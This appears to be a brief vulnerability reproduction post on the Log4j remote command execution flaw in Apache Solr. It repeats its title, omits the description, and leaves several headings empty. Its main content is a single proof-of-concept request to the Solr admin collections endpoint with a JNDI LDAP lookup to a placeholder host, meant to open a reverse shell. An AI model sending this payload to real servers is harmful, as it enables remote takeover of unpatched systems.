Apache Solr Log4j component Remote command execution vulnerability
Apache Solr Log4j component Remote command execution vulnerability
Apache Solr Log4j component Remote command execution vulnerability
Vulnerability Description
Apache Solr Log4j component Remote command execution vulnerability, details are omitted
Vulnerability Impact
Apache Solr
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json
This post is licensed under CC BY 4.0 by the author.